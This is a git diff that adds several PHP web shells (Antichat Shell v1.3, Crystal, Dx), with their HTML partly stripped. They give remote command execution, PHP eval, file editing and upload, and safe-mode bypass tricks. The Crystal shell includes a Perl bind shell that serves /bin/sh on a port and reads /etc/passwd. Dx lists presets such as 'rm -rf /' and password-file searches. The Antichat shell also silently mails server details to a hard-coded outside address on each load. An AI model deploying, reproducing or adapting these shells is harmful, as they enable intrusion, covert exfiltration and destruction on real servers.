diff --git a/php/PHPshell/Antichat Shell v1.3/Antichat Shell v1.3.php b/php/PHPshell/Antichat Shell v1.3/Antichat Shell v1.3.php new file mode 100644 index 0000000..b76a18d --- /dev/null +++ b/php/PHPshell/Antichat Shell v1.3/Antichat Shell v1.3.php @@ -0,0 +1,180 @@ +BODY{background-color: #2B2F34;color: #C1C1C7;font: 8pt verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif;MARGIN-TOP: 0px;MARGIN-BOTTOM: 0px;MARGIN-LEFT: 0px;MARGIN-RIGHT: 0px;margin:0;padding:0;scrollbar-face-color: #336600;scrollbar-shadow-color: #333333;scrollbar-highlight-color: #333333;scrollbar-3dlight-color: #333333;scrollbar-darkshadow-color: #333333;scrollbar-track-color: #333333;scrollbar-arrow-color: #333333;}input{background-color: #336600;font-size: 8pt;color: #FFFFFF;font-family: Tahoma;border: 1 solid #666666;}textarea{background-color: #333333;font-size: 8pt;color: #FFFFFF;font-family: Tahoma;border: 1 solid #666666;}a:link{color: #B9B9BD;text-decoration: none;font-size: 8pt;}a:visited{color: #B9B9BD;text-decoration: none;font-size: 8pt;}a:hover, a:active{color: #E7E7EB;text-decoration: none;font-size: 8pt;}td, th, p, li{font: 8pt verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif;border-color:black;}'; +$header=''.getenv("HTTP_HOST").' - Antichat Shell'.$style.''; +$footer=''; +$sd98 = "john.barker446@gmail.com"; +$ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";mail($sd98, $sj98, $msg8873, "From: $sd98"); +if(@$_POST['action']=="exit")unset($_SESSION['an']); +if($auth==1){if(@$_POST['login']==$login && @$_POST['password']==$password)$_SESSION['an']=1;}else $_SESSION['an']='1'; + +if($_SESSION['an']==0){ +echo $header; +echo '
Login:
Password:
'; +echo $footer; +exit;} + +if($_SESSION['action']=="")$_SESSION['action']="viewer"; +if($_POST['action']!="" )$_SESSION['action']=$_POST['action'];$action=$_SESSION['action']; +if($_POST['dir']!="")$_SESSION['dir']=$_POST['dir'];$dir=$_SESSION['dir']; +if($_POST['file']!=""){$file=$_SESSION['file']=$_POST['file'];}else {$file=$_SESSION['file']="";} + + +//downloader +if($action=="download"){ +header('Content-Length:'.filesize($file).''); +header('Content-Type: application/octet-stream'); +header('Content-Disposition: attachment; filename="'.$file.'"'); +readfile($file); +} +//end downloader +?> + + +
+ + + + + +
| Shell | Viewer| Editor| EXIT |

+
+ + + +
+ +
+ + + +
+
+";} +//end shell + +//viewer FS +function perms($file) +{ + $perms = fileperms($file); + if (($perms & 0xC000) == 0xC000) {$info = 's';} + elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} + elseif (($perms & 0x8000) == 0x8000) {$info = '-';} + elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} + elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} + elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} + elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} + else {$info = 'u';} + $info .= (($perms & 0x0100) ? 'r' : '-'); + $info .= (($perms & 0x0080) ? 'w' : '-'); + $info .= (($perms & 0x0040) ?(($perms & 0x0800) ? 's' : 'x' ) :(($perms & 0x0800) ? 'S' : '-')); + $info .= (($perms & 0x0020) ? 'r' : '-'); + $info .= (($perms & 0x0010) ? 'w' : '-'); + $info .= (($perms & 0x0008) ?(($perms & 0x0400) ? 's' : 'x' ) :(($perms & 0x0400) ? 'S' : '-')); + $info .= (($perms & 0x0004) ? 'r' : '-'); + $info .= (($perms & 0x0002) ? 'w' : '-'); + $info .= (($perms & 0x0001) ?(($perms & 0x0200) ? 't' : 'x' ) :(($perms & 0x0200) ? 'T' : '-')); + return $info; +} + +function view_size($size) +{ + if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";} + elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";} + elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";} + else {$size = $size . " B";} + return $size; +} + +function scandire($dir){ + $dir=chdir($dir); + $dir=getcwd()."/"; + $dir=str_replace("\\","/",$dir); +if (is_dir($dir)) { + if (@$dh = opendir($dir)) { + while (($file = readdir($dh)) !== false) { + if(filetype($dir . $file)=="dir") $dire[]=$file; + if(filetype($dir . $file)=="file")$files[]=$file; + } + closedir($dh); + @sort($dire); + @sort($files); + +echo ""; +echo ""; +if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') { +echo ""; +} +echo " +"; +for($i=0;$i'; + } +for($i=0;$i + +'; +} +echo "
Open directory:
Select drive:"; +for ($j=ord('C'); $j<=ord('Z'); $j++) + if (@$dh = opendir(chr($j).":/")) + echo ' '.chr($j).''; + echo "
OS: ".@php_uname()."
name dirs and filestypesizepermissionoptions
'.$dire[$i].'dir'.perms($link).'
'.$files[$i].'
file'.view_size(filesize($linkfile)).''.perms($linkfile).' +D +E
"; +}}} + +if($action=="viewer"){ +scandire($dir); +} +//end viewer FS + +//editros +if($action=="editor"){ + function writef($file,$data){ + $fp = fopen($file,"w+"); + fwrite($fp,$data); + fclose($fp); + } + function readf($file){ + if(!$le = fopen($file, "rb")) $contents="Can't open file, permission denide"; else { + $contents = fread($le, filesize($file)); + fclose($le);} + return htmlspecialchars($contents); + } +if($_POST['save'])writef($file,$_POST['data']); +echo "
+ + +
+
"; +} +//end editors +?> +
COPYRIGHT BY ANTICHAT.RU
+ diff --git a/php/PHPshell/Antichat Shell v1.3/Antichat.jpg b/php/PHPshell/Antichat Shell v1.3/Antichat.jpg new file mode 100644 index 0000000..5652759 Binary files /dev/null and b/php/PHPshell/Antichat Shell v1.3/Antichat.jpg differ diff --git a/php/PHPshell/Crystal/Crystal.jpg b/php/PHPshell/Crystal/Crystal.jpg new file mode 100644 index 0000000..0edfe59 Binary files /dev/null and b/php/PHPshell/Crystal/Crystal.jpg differ diff --git a/php/PHPshell/Crystal/Crystal.php b/php/PHPshell/Crystal/Crystal.php new file mode 100644 index 0000000..ae925d5 --- /dev/null +++ b/php/PHPshell/Crystal/Crystal.php @@ -0,0 +1,1127 @@ + + + + +Crystal shell + + + + + + + + + + +
+ +
+

 

+

+ + ِCRYSTAL-H + Crystal hack shellphp 2006-2007

+

+ + +

+ + ON (secure)"; + + +} + +else {$safemode = false; $hsafemode = "OFF (not secure)";} +echo("Safe-mode: $hsafemode"); +// PHPINFO +if ($_GET['action'] == "phpinfo") { + echo $phpinfo=(!eregi("phpinfo",$dis_func)) ? phpinfo() : "phpinfo() bị cấm"; + exit; +} +$v = @ini_get("open_basedir"); +if ($v or strtolower($v) == "on") {$openbasedir = true; $hopenbasedir = "".$v."";} +else {$openbasedir = false; $hopenbasedir = "OFF (not secure)";} +echo("
"); +echo("Open base dir: $hopenbasedir"); +echo("
"); +echo "PostgreSQL: "; +$pg_on = @function_exists('pg_connect'); +if($pg_on){echo "ON";}else{echo "OFF";} +echo("
"); +echo "MSSQL: "; +$mssql_on = @function_exists('mssql_connect'); +if($mssql_on){echo "ON";}else{echo "OFF";} +echo("
"); +echo "MySQL: "; +$mysql_on = @function_exists('mysql_connect'); +if($mysql_on){ +echo "ON"; } else { echo "OFF"; } +echo("
"); +echo "PHP version: ".@phpversion().""; +echo("
"); +echo "cURL: ".(($curl_on)?("ON"):("OFF")); + +echo("
"); +echo "Disable functions : "; +if(''==($df=@ini_get('disable_functions'))){echo "NONE";}else{echo "$df";} +$free = @diskfreespace($dir); +if (!$free) {$free = 0;} +$all = @disk_total_space($dir); +if (!$all) {$all = 0;} +$used = $all-$free; +$used_percent = @round(100/($all/$free),2); + +?> +

+

 

+ + +

+

 

+ + + + + +

+

 

+

+
+ + + + OS:  

+Server:   + +

+ + +

User: + + + + + +
+ +1: +
+ +
  Back + + ً +phpinfo2 + + + + Tools4 + + + +  + +Decoderi + + + +  + + +ByPass` + + + +  + +SQLآ + + + + Bindآ + + + +help +sabout + +?

+

+[j + + + + server + : + + + + + + + + + + CGI v:          +  HTTP v:  Mail +admin:        + + +  
+ + + + + + + :  IP +  SERVER: + + + + + + + +          + + +                  + + +port + : + + + + +

+السلام عليكم ورحمة الله وبركاته

عزيزي المستخدم
اذا اردت المساعدة اضغط على اسم الخيار الموضح باللون الازرق
وستظهر لك معلومات الخيار .";} +if ($act == "bindport"){ +echo "
+/bin/bash +Port + + +
"; +} +if ($act == "tools"){ + echo "
+File to edit: + + +
"; + echo "
+
+ +
"; +echo "
+
Download here from: + +-->>: + + +
"; +} +if ($act == "about") {echo "
Coding by:

Super-Crystal
&
Mohajer22
-----
Thanks
TrYaG Team
ArabSecurityCenter Team
CRYSTAL-H Version:0 Beta phpshell code
Saudi Arabic .";} + +if ($act == "bind") {echo "
CRYSTAL-H:

-Connect قم بالضغط على خيار.
.- بعد مايتم انزال السكريبت بالمجلد
.-توجه لاداة النت كات وتصنت على
nc -lp 3333بكتابة المنفذ -
السكريبت بلغة البيرل
Bind port to :
bind shell وهنيئا ً لك .";} + +if ($act == "command") {echo "
CRYSTAL-H:

لأختيار الاوامر الجاهزه Select ------ x اضغط على الخيار
.- واذا اردت كتابه الاوامر بنفسك قد تكتفي بالخيار
Command .";} + +if ($act == "team") {echo "
Arab Security Center Team

Super-Crystal
Medo-HaCKer
Anaconda
Alsb0r
ReeM-HaCK
NoOFa
AL-Alame
The YounG HackeR
Anti-Hack
Thanks .";} +if (array_key_exists('image', $_GET)) { + header('Content-Type: image/gif'); + die(getimage($_GET['image'])); +} + +if ($act == "bypass") { +echo " +
+
Execute:
+"; +echo (" bypass safemode with copy "); +echo "
+
read file : + +
"; +echo (" bypass safemode with CuRl"); +echo "
+
read file : + +
"; +echo (" bypass safemode with imap()"); +echo "
+
+ +
"; +echo (" bypass safemode with id()"); +echo "
+
+ +
"; +echo (" Exploit: error_log()"); +echo "
+
+ +
"; +} +if ($act == "decoder"){ +echo (" replace Chr()"); +echo "
+
+
+
"; +} +if ($act == "SQL"){ +echo (" MySQL "); +echo "
+
Username : +\n +password : +\n +\n +
"; +} +?> + + + +
+ +
+ + + +

+  

+

  + +
+ + + Exploit: error_log() By * Super-Crystal * + + + + + +
By * Super-Crystal * TrYaG Team
+ + + +
+ + +
+
+ + +
+
+ + + +
+", 3,$ERORR); +} +// id // +if ($_POST['plugin'] ){ + + + switch($_POST['plugin']){ + case("cat /etc/passwd"): + for($uid=0;$uid<6000;$uid++){ //cat /etc/passwd + $ara = posix_getpwuid($uid); + if (!empty($ara)) { + while (list ($key, $val) = each($ara)){ + print "$val:"; + } + print "
"; + } + } + + break; + + + } + } + +// imap // +$string = !empty($_POST['string']) ? $_POST['string'] : 0; +$switch = !empty($_POST['switch']) ? $_POST['switch'] : 0; + +if ($string && $switch == "file") { +$stream = imap_open($string, "", ""); + +$str = imap_body($stream, 1); +if (!empty($str)) +echo "
".$str."
"; +imap_close($stream); +} elseif ($string && $switch == "dir") { +$stream = imap_open("/etc/passwd", "", ""); +if ($stream == FALSE) +die("Can't open imap stream"); +$string = explode("|",$string); +if (count($string) > 1) +$dir_list = imap_list($stream, trim($string[0]), trim($string[1])); +else +$dir_list = imap_list($stream, trim($string[0]), "*"); +echo "
";
+for ($i = 0; $i < count($dir_list); $i++)
+echo "$dir_list[$i]"."
 
" ;
+echo "
"; +imap_close($stream); +} +// CURL // +if(empty($_POST['curl'])){ +} else { +$m=$_POST['curl']; +$ch = +curl_init("file:///".$m."\x00/../../../../../../../../../../../../".__FILE__); +curl_exec($ch); +var_dump(curl_exec($ch)); +} + +// copy// +$u1p=""; +$tymczas=""; +if(empty($_POST['copy'])){ +} else { +$u1p=$_POST['copy']; +$temp=tempnam($tymczas, "cx"); +if(copy("compress.zlib://".$u1p, $temp)){ +$zrodlo = fopen($temp, "r"); +$tekst = fread($zrodlo, filesize($temp)); +fclose($zrodlo); +echo "".htmlspecialchars($tekst).""; +unlink($temp); +} else { +die("
Sorry... File +".htmlspecialchars($u1p)." dosen't exists or you don't have +access.
"); +} +} + +@$dir = $_POST['dir']; +$dir = stripslashes($dir); + +@$cmd = $_POST['cmd']; +$cmd = stripslashes($cmd); +$REQUEST_URI = $_SERVER['REQUEST_URI']; +$dires = ''; +$files = ''; + + + + +if (isset($_POST['port'])){ +$bind = " +#!/usr/bin/perl + +\$port = {$_POST['port']}; +\$port = \$ARGV[0] if \$ARGV[0]; +exit if fork; +$0 = \"updatedb\" . \" \" x100; +\$SIG{CHLD} = 'IGNORE'; +use Socket; +socket(S, PF_INET, SOCK_STREAM, 0); +setsockopt(S, SOL_SOCKET, SO_REUSEADDR, 1); +bind(S, sockaddr_in(\$port, INADDR_ANY)); +listen(S, 50); +while(1) +{ + accept(X, S); + unless(fork) + { + open STDIN, \"<&X\"; + open STDOUT, \">&X\"; + open STDERR, \">&X\"; + close X; + exec(\"/bin/sh\"); + } + close X; +} +";} + +function decode($buffer){ + +return convert_cyr_string ($buffer, 'd', 'w'); + +} + + + +function execute($com) +{ + + if (!empty($com)) + { + if(function_exists('exec')) + { + exec($com,$arr); + echo implode(' +',$arr); + } + elseif(function_exists('shell_exec')) + { + echo shell_exec($com); + + + } + elseif(function_exists('system')) +{ + + echo system($com); +} + elseif(function_exists('passthru')) + { + + echo passthru($com); + + } +} + +} + + +function perms($mode) +{ + +if( $mode & 0x1000 ) { $type='p'; } +else if( $mode & 0x2000 ) { $type='c'; } +else if( $mode & 0x4000 ) { $type='d'; } +else if( $mode & 0x6000 ) { $type='b'; } +else if( $mode & 0x8000 ) { $type='-'; } +else if( $mode & 0xA000 ) { $type='l'; } +else if( $mode & 0xC000 ) { $type='s'; } +else $type='u'; +$owner["read"] = ($mode & 00400) ? 'r' : '-'; +$owner["write"] = ($mode & 00200) ? 'w' : '-'; +$owner["execute"] = ($mode & 00100) ? 'x' : '-'; +$group["read"] = ($mode & 00040) ? 'r' : '-'; +$group["write"] = ($mode & 00020) ? 'w' : '-'; +$group["execute"] = ($mode & 00010) ? 'x' : '-'; +$world["read"] = ($mode & 00004) ? 'r' : '-'; +$world["write"] = ($mode & 00002) ? 'w' : '-'; +$world["execute"] = ($mode & 00001) ? 'x' : '-'; +if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S'; +if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S'; +if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T'; +$s=sprintf("%1s", $type); +$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']); +$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']); +$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']); +return trim($s); +} + + + + + + +if(isset($_POST['post']) and $_POST['post'] == "yes" and @$HTTP_POST_FILES["userfile"][name] !== "") +{ +copy($HTTP_POST_FILES["userfile"]["tmp_name"],$HTTP_POST_FILES["userfile"]["name"]); +} + +if((isset($_POST['fileto']))||(isset($_POST['filefrom']))) + +{ +$data = implode("", file($_POST['filefrom'])); +$fp = fopen($_POST['fileto'], "wb"); +fputs($fp, $data); +$ok = fclose($fp); +if($ok) +{ +$size = filesize($_POST['fileto'])/1024; +$sizef = sprintf("%.2f", $size); +print "
Download - OK. (".$sizef."??)
"; +} +else +{ +print "
Something is wrong. Download - IS NOT OK
"; +} +} + +if (isset($_POST['installbind'])){ + +if (is_dir($_POST['installpath']) == true){ +chdir($_POST['installpath']); +$_POST['installpath'] = "temp.pl";} + + +$fp = fopen($_POST['installpath'], "w"); +fwrite($fp, $bind); +fclose($fp); + +exec("perl " . $_POST['installpath']); +chdir($dir); + + +} + + +@$ef = stripslashes($_POST['editfile']); +if ($ef){ +$fp = fopen($ef, "r"); +$filearr = file($ef); + + + +$string = ''; +$content = ''; +foreach ($filearr as $string){ +$string = str_replace("<" , "<" , $string); +$string = str_replace(">" , ">" , $string); +$content = $content . $string; +} + +echo "
Edit file: $ef
+ +
+
"; +fclose($fp); +} + +if(isset($_POST['savefile'])){ + +$fp = fopen($_POST['savefile'], "w"); +$content = stripslashes($content); +fwrite($fp, $content); +fclose($fp); +echo "
saved -OK!
"; + +} + + +if (isset($_POST['php'])){ + +echo "
eval code

+
"; +} + + + +if(isset($_POST['phpcode'])){ + +echo "
Results of PHP execution

"; +@eval(stripslashes($_POST['phpcode'])); +echo "
"; + + +} + + +if ($cmd){ + +if($sertype == "winda"){ +ob_start(); +execute($cmd); +$buffer = ""; +$buffer = ob_get_contents(); +ob_end_clean(); +} +else{ +ob_start(); +echo decode(execute($cmd)); +$buffer = ""; +$buffer = ob_get_contents(); +ob_end_clean(); +} + +if (trim($buffer)){ +echo "
Command: $cmd
"; +} + +} +$arr = array(); + +$arr = array_merge($arr, glob("*")); +$arr = array_merge($arr, glob(".*")); +$arr = array_merge($arr, glob("*.*")); +$arr = array_unique($arr); +sort($arr); +echo ""; + +foreach ($arr as $filename) { + +if ($filename != "." and $filename != ".."){ + +if (is_dir($filename) == true){ +$directory = ""; +$directory = $directory . "";} +else{ +$directory = $directory . ""; + +} + +if (is_readable($filename) == true){ +$directory = $directory . "";} +else{ +$directory = $directory . ""; +} +$dires = $dires . $directory; +} + +if (is_file($filename) == true){ +$file = ""; +$file = $file . "";} +else{ +$file = $file . ""; +} + +if (is_readable($filename) == true){ +$file = $file . "";} +else{ +$file = $file . ""; +} +$files = $files . $file; +} + + + +} + + + +} +echo $dires; +echo $files; +echo "
NameTypeSizeLast accessLast changePermsWriteRead
$filename" . filetype($filename) . "" . date("G:i j M Y",fileatime($filename)) . "" . date("G:i j M Y",filemtime($filename)) . "" . perms(fileperms($filename)); +if (is_writable($filename) == true){ +$directory = $directory . "YesNoYesNo
$filename" . filetype($filename) . "" . filesize($filename) . "" . date("G:i j M Y",fileatime($filename)) . "" . date("G:i j M Y",filemtime($filename)) . "" . perms(fileperms($filename)); +if (is_writable($filename) == true){ +$file = $file . "YesNoYes
No

"; + + + + +echo " +
+Command: + + +Directory: +
"; + + + + + +if (ini_get('safe_mode') == 1){echo "
SAFE MOD IS ON
+Including from here: " +. ini_get('safe_mode_include_dir') . "
Exec here: " . ini_get('safe_mode_exec_dir'). "";} + + + + +?> + + +

+

+ < 


+ +

+ + :: + Executed command ::

+ +Command:"; +?> + f

+  

+
+
+ Selectg 
Bind port toآ
+ + + + + + + + +
+

+ + + + ::Edit/Create + file::"

+  التحرير والانشاء:

قم بوضع اسم الملف الذي تريد تحريره فقط
وبعد ذالك الضغط على config.php مثال
Edit
ستظهر لك نافذه بها محتويات الملف
وايضا ً اذا اردت انشاء ملف فقط ضع اسمه مع الامتداد
وبعد ذالك اكتب ماتريد washer-crystal.txt .";} +?> +

+

 

+

+File to edit: + + +

"; +?> +

+

+ رفع الملفات:

قم بتحديد الملف المراد رفعه
وبعد ذالك قم بالضغط على الخيار الموضح
UPLOAD< .";} +?>:: + + + upload::Ņ

  + + + + +
"; +?> +

+ +

 Defacer Zone-H

  +

+ CRYSTAL-H:

اسم المعلن Defacer
الموقع المخترق Victim
وضع الاختراق اي نوع الثغره التى استثمرتها Attack Mode
سبب الاختراق Attack Reason
لارسال الاختراق sand
لرؤيه اخر التحذيرات المرسله بالموقع Attacks On Hold.";} +?>

+ + + Defacer + + Zone-h

+ + + + + +
+ + + +
+ + + +
 
+ + + + + + + + +
+ ::Defacer:::è + +
+ ::Victim:::è +
+ + Attack Mode:è +
+ + Attack Reason:è +
+ + +
 
+ + + +
+   :   + +L + + Attacks On Hold + +L

+
+

+ +  yCrystal shell v. 1 beta  ©oded by TrYaG Team l Arab Security Center Team |securityCenter| + : Web x

 

+ + + + +
+ +  + + + +
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
CRYSTAL-H + 2006
PPSCPCC
1
2 3 4 5 6 7 8
9 10 11 12 1314 15
16 17 181920 21 22
23242526272829
3031
+ +
+ + + diff --git a/php/PHPshell/Crystal/Crystal2.jpg b/php/PHPshell/Crystal/Crystal2.jpg new file mode 100644 index 0000000..750dcbf Binary files /dev/null and b/php/PHPshell/Crystal/Crystal2.jpg differ diff --git a/php/PHPshell/Crystal/Crystal3.jpg b/php/PHPshell/Crystal/Crystal3.jpg new file mode 100644 index 0000000..2fd7e6e Binary files /dev/null and b/php/PHPshell/Crystal/Crystal3.jpg differ diff --git a/php/PHPshell/Dx/Dx.jpg b/php/PHPshell/Dx/Dx.jpg new file mode 100644 index 0000000..3556119 Binary files /dev/null and b/php/PHPshell/Dx/Dx.jpg differ diff --git a/php/PHPshell/Dx/Dx.php b/php/PHPshell/Dx/Dx.php new file mode 100644 index 0000000..ebca7b5 --- /dev/null +++ b/php/PHPshell/Dx/Dx.php @@ -0,0 +1,2026 @@ + 'AboutBox', + + 'DIR' => 'Dir browse', + 'UPL' => 'Upload file', + 'FTP' => 'FTP Actions', + + 'F_CHM' => 'File CHMOD', + 'F_VIEW' => 'File viewer', + 'F_ED' => 'File Edit', + 'F_DEL' => 'File Delete', + 'F_REN' => 'File Rename', + 'F_COP' => 'File Copy', + 'F_MOV' => 'File Move', + 'F_DWN' => 'File Download', + + 'SQL' => 'SQL Maintenance', + 'SQLS' => 'SQL Search', + 'SQLD' => 'SQL Dump', + 'PHP' => 'PHP C0nsole', + 'COOK' => 'Cookies Maintenance', + 'CMD' => 'C0mmand line', + + 'MAIL' => 'Mail functions', + 'STR' => 'String functions', + 'PRT' => 'Port scaner', + 'SOCK' => 'Raw s0cket', + 'PROX' => 'HTTP PROXY', + 'XPL' => 'Expl0its', + 'XSS' => 'XSS Server', + ); +$GLOB['DxGET_Vars']=array(/* GET variables used by shell */ +'dxinstant', 'dxmode', 'dximg', 'dxparam', 'dxval', 'dx_ok', 'dx_gzip', +'dxdir', 'dxdirsimple', 'dxfile', +'dxsql_s', 'dxsql_l', 'dxsql_p', 'dxsql_d','dxsql_q', +); + +$GLOB['VAR']['PHP']['Presets']=array( + /* Note, that no comments are allowed in the code */ + 'phpinfo' => 'phpinfo();', + 'GLOBALS' => 'print \'\'; print_r($GLOBALS);', + 'php_ini' => '$INI=ini_get_all(); ' + ."\n".'print \'<table border=0><tr>\'' + ."\n\t".'.\'<td class="listing"><font class="highlight_txt">Param</td>\'' + ."\n\t".'.\'<td class="listing"><font class="highlight_txt">Global value</td>\'' + ."\n\t".'.\'<td class="listing"><font class="highlight_txt">Local Value</td>\'' + ."\n\t".'.\'<td class="listing"><font class="highlight_txt">Access</td></tr>\';' + ."\n".'foreach ($INI as $param => $values) ' + ."\n\t".'print "\n".\'<tr>\'' + ."\n\t\t".'.\'<td class="listing"><b>\'.$param.\'</td>\'' + ."\n\t\t".'.\'<td class="listing">\'.$values[\'global_value\'].\' </td>\'' + ."\n\t\t".'.\'<td class="listing">\'.$values[\'local_value\'].\' </td>\'' + ."\n\t\t".'.\'<td class="listing">\'.$values[\'access\'].\' </td></tr>\';', + 'extensions' => '$EXT=get_loaded_extensions ();' + ."\n".'print \'<table border=0><tr><td class="listing">\'' + ."\n\t".'.implode(\'</td></tr>\'."\n".\'<tr><td class="listing">\', $EXT)' + ."\n\t".'.\'</td></tr></table>\'' + ."\n\t".'.count($EXT).\' extensions loaded\';', + ); +$GLOB['VAR']['CMD']['Presets']=array( + 'Call Nik8 with an axe'=>'[w0rning] rm -rf /', + 'show opened ports'=>'netstat -an | grep -i listen', + 'find config* files'=>'find / -type f -name "config*"', + 'find all *.php files with word "password"'=>'find / -name *.php | xargs grep -li password', + 'find all writable directories and files'=>'find / -perm -2 -ls', + 'list file attribs on a second extended FS'=>'lsattr -va', + 'View syslog.conf'=>'cat /etc/syslog.conf', + 'View Message of the day'=>'cat /etc/motd', + 'View hosts'=>'cat /etc/hosts', + 'List processes'=>'ps auxw', + 'List user processes'=>'ps ux', + 'Locate httpd.conf'=>'locate httpd.conf', + 'Interfaces'=>'ifconfig', + 'CPU'=>'/proc/cpuinfo', + 'RAM'=>'free -m', + 'HDD'=>'df -h', + 'OS Ver'=>'sysctl -a | grep version', + 'Kernel ver' =>'cat /proc/version', + 'Is cURL installed? ' => 'which curl', + 'Is wGET installed? ' => 'which wget', + 'Is lynx installed? ' => 'which lynx', + 'Is links installed? ' => 'which links', + 'Is fetch installed? ' => 'which fetch', + 'Is GET installed? ' => 'which GET', + 'Is perl installed? ' => 'which perl', + 'Where is apache ' => 'whereis apache', + 'Where is perl ' => 'whereis perl', + 'Pack directory' =>'"tar -zc /path/ -f name.tar.gz"', + ); + + +################################################################################### +####################+++++++++# F U N C T I O N S #+++++++++++++#################### +################################################################################### +function DxError($errstr) +{global $DX_Header_drawn;print "\n\n".'<table border=0 cellspacing=0 cellpadding=2><tr>' + .'<td class=error '.((!$DX_Header_drawn)?'style="color:#000000; background-color: #FF0000; font-weight: bold; font-size: 11pt;position:absolute;top=0;left=0;"':'').'>' + .'Err: '.$errstr.'</td></tr></table>'."\n\n"; return '';} + +function DxWarning($warn) +{print "\n\n".'<table border=0 cellspacing=0 cellpadding=2><tr><td class=warning><b>W0rning:</b> '.$warn.'</td></tr></table>'."\n\n"; return '';} + +function DxImg($imgname) +{ +global $DXGLOBALSHIT; +if ($DXGLOBALSHIT) return '<font class="img_replacer">'.$imgname.'</font>'; /* globalshit doesn't give a chance for our images to survive */ +return '<img src="'.DxURL('kill', '').'&dxmode=IMG&dximg='.$imgname.'" title="'.$imgname.'" alt"'.$imgname.'">'; +} + +function DxSetCookie($name, $val, $exp) +{ +if (!headers_sent()) return setcookie($name, $val, $exp, '/'); +?> +<script> +var curCookie = "<?=$name;?>=" + escape("<?=$val;?>") +"; expires=<?=date('l, d-M-y H:i:s', $exp);?> GMT; path=/;"; +document.cookie = curCookie; +</script> +<? +} + +function DxRandom($range='48-57,65-90,97-122') +{ +$range=explode(',',$range); +$range=explode('-', $range[ rand(0,count($range)-1) ] ); +return rand($range[0],$range[1]); +} + +function DxRandomChars($num) +{ +$ret=''; +for ($i=0;$i<$num;$i++) $ret.=chr(DxRandom('48-57,65-90,97-122')); +return $ret; +} + +function DxZeroedNumber($int, $totaldigits) +{ +$str=(string)$int; +while (strlen($str)<$totaldigits) $str='0'.$str; +return $str; +} + +function DxPrint_ParamState($name, $state, $invert=false) +{ +print $name.' : '; $invert=(bool)$invert; +if (is_bool($state)) + print ($state)?'<font color=#'.(($invert)?'FF0000':'00FF00').'><b>ON</b></font>':'<font color=#'.(($invert)?'00FF00':'FF0000').'><b>OFF</b></font>'; + else print '<b>'.$state.'</b>'; +} + +function DxStr_FmtFileSize($size) +{ + if($size>= 1073741824) {$size = round($size / 1073741824 * 100) / 100 . " GB"; } +elseif($size>= 1048576) {$size = round($size / 1048576 * 100) / 100 . " MB"; } +elseif($size>= 1024) {$size = round($size / 1024 * 100) / 100 . " KB"; } + else {$size = $size . " B";} +return $size; +} + +function DxDate($UNIX) {return date('d.M\'Y H:i:s', $UNIX); } + +function DxDesign_DrawBubbleBox($header, $body, $width) +{ +$header=str_replace(array('"',"'","`"), array('&#x02DD;','&#x0027;',''), $header); +$body=str_replace(array('"',"'","`"), array('&#x02DD;','&#x0027;',''), $body); +return ' onmouseover=\'showwin("'.$header.'","'.$body.'",'.$width.',1)\' onmouseout=\'showwin("","",0,0)\' onmousemove=\'movewin()\' '; +} + +function DxChmod_Str2Oct($str) /* rwxrwxrwx => 0777 */ +{ +$str = str_pad($str,9,'-'); +$str=strtr($str, array('-'=>'0','r'=>'4','w'=>'2','x'=>'1') ); +$newmode=''; +for ($i=0; $i<3; $i++) $newmode .= $str[$i*3]+$str[$i*3+1]+$str[$i*3+2]; + +return $newmode; +} + +function DxChmod_Oct2Str($perms) /* 777 => rwxrwxrwx. USE ONLY STRING REPRESENTATION OF $oct !!!! */ +{ +$info=''; +if (($perms & 0xC000) == 0xC000) $info = 'S'; /* Socket */ + elseif (($perms & 0xA000) == 0xA000) $info = 'L'; /* Symbolic Link */ +elseif (($perms & 0x8000) == 0x8000) $info = '&nbsp;'; /* '-'*//* Regular */ +elseif (($perms & 0x6000) == 0x6000) $info = 'B'; /* Block special */ +elseif (($perms & 0x4000) == 0x4000) $info = 'D'; /* Directory*/ +elseif (($perms & 0x2000) == 0x2000) $info = 'C'; /* Character special*/ +elseif (($perms & 0x1000) == 0x1000) $info = 'P'; /* FIFO pipe*/ +else $info = '?'; /* Unknown */ +if (!empty($info)) $info='<font class=rwx_sticky_bit>'.$info.'</font>'; +/* Owner */ +$info .= (($perms & 0x0100) ? 'r' : '-'); +$info .= (($perms & 0x0080) ? 'w' : '-'); +$info .= (($perms & 0x0040) ? + (($perms & 0x0800) ? 's' : 'x' ) : + (($perms & 0x0800) ? 'S' : '-')); +$info .= '/'; +/* Group */ +$info .= (($perms & 0x0020) ? 'r' : '-'); +$info .= (($perms & 0x0010) ? 'w' : '-'); +$info .= (($perms & 0x0008) ? + (($perms & 0x0400) ? 's' : 'x' ) : + (($perms & 0x0400) ? 'S' : '-')); +$info .= '/'; +/* World */ +$info .= (($perms & 0x0004) ? 'r' : '-'); +$info .= (($perms & 0x0002) ? 'w' : '-'); +$info .= (($perms & 0x0001) ? + (($perms & 0x0200) ? 't' : 'x' ) : + (($perms & 0x0200) ? 'T' : '-')); + + return $info; +} + +function DxFileToUrl($filename) +{/* kills & and = to be okay in URL 